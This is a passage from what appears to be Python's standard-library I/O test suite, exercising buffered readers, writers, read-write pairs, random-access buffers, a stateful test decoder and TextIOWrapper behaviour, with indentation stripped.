self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
